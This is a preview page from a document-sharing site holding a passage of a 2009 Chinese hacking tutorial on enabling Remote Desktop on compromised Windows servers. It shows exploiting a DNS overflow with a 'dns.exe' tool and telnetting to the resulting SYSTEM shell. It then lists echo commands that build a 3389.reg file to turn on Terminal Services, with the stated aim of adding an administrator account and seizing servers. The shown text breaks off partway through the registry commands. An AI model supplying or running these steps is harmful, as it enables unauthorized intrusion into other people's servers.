cmd下开启远程桌面服务

cmd下开启远程桌面服务

ID:32398779

大小:31.00 KB

页数:4页

时间:2019-02-04

cmd下开启远程桌面服务_第1页
cmd下开启远程桌面服务_第2页
cmd下开启远程桌面服务_第3页
cmd下开启远程桌面服务_第4页
资源描述:

《cmd下开启远程桌面服务》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、CMD下开启远程桌面服务文章整理发布:黑客风云内容关注度:24更新时间:2009-11-41:44:32  一、缘起  近段时间微软出现的DNS溢出漏洞疯狂了一段时间,就是现在也还有许多服务器可以成功溢出。相信大家都有体验过溢出的经验了吧,嘿嘿。但是当我们溢出成功后,返回得到的就只有一个system权限的cmdshell。要是服务器开启了远程桌面服务,那我们直接加一个用户,再添加进管理员组,就可以登录服务器了。这样的话,拿下存在DNS溢出的服务器只是分秒间的事情。从溢出到得到服务器控制权花不了多少时间。不过,要是服务器本身没有开启远程桌面服务,就相对来说比较麻烦一点了。话

2、虽如此,服务器本身没开,那我们就帮它开嘛,嘿嘿。  二、理论  在只有一个cmdshell的情况下,可能有不少菜菜不知道如何开启远程桌面服务。不过如果对远程桌面服务比较了解的话,应该知道开启它其实主要就是修改了注册表的某些键值来实现的。如何在cmdshell下修改注册表相关键值呢?根据系统的不同,方法也有些出入。Windows2000的服务器开户远程桌面服务一般都需要重启一次才能生效,Windows2003的服务器开启远程桌面服务就一般都不需要重启,直接更改注册表相关键值即可生效!据网上的资料来看,基本上都是先echo一个*.reg注册表文件,再使用regedit/s*.

3、reg命令导入注册表文件即可,当然2000的话还需要重启才生效。  三、实践  理论总是理论,不实践过永远都只能是理论。所以我们找了些可以DNS溢出的服务器来做试验,其中有2000系统的也有2003系统的,分别详细说明——如何在cmdshell下开启服务器的远程桌面服务。  1、2000系统  简要说一下如何进行DNS溢出攻击。我用的溢出利用程序是dns.exe,在CMD下运行它可以看到它的使用参数等信息。执行"dns-sIP"命令检测目标IP是否存在DNS溢出漏洞。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows2000!接着我们进行溢出攻击,执行

4、"dns-t2000allIP1207"后提示要我们检测返回的1100端口的shell。"telnetIP1100"成功得到返回的cmdshell。注意目录为c:WINNTsystem32,顶部也明显可以看到Windows2000相关字样。接着我们需要做的是使用"echo"命令写入一个3389.reg注册表文件。将如下代码一行一行地复制到cmdshell窗口后按回车执行:echoWindowsRegistryEditorVersion5.00>3389.reg  echo.>>3389.reg  echo[HKEY_LOCAL_MACHINESOFTWAREMic

5、rosoftWindowsCurrentVersionetcache]>>3389.reg  echo"Enabled"="0">>3389.reg  echo[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon]>>3389.reg  echo"ShutdownWithoutLogon"="0">>3389.reg  echo[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]>>3389.r

6、eg  echo"EnableAdminTSRemote"=dword:00000001>>3389.reg  echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer]>>3389.reg  echo"TSEnabled"=dword:00000001>>3389.reg  echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]>>3389.reg  echo"Start"=dword:00000002>>33

7、89.reg  echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]>>3389.reg  echo"Start"=dword:00000002>>3389.reg  echo[HKEY_USERS.DEFAULTKeyboardLayoutToggle]>>3389.reg  echo"Hotkey"="1">>3389.reg  echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetCo

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。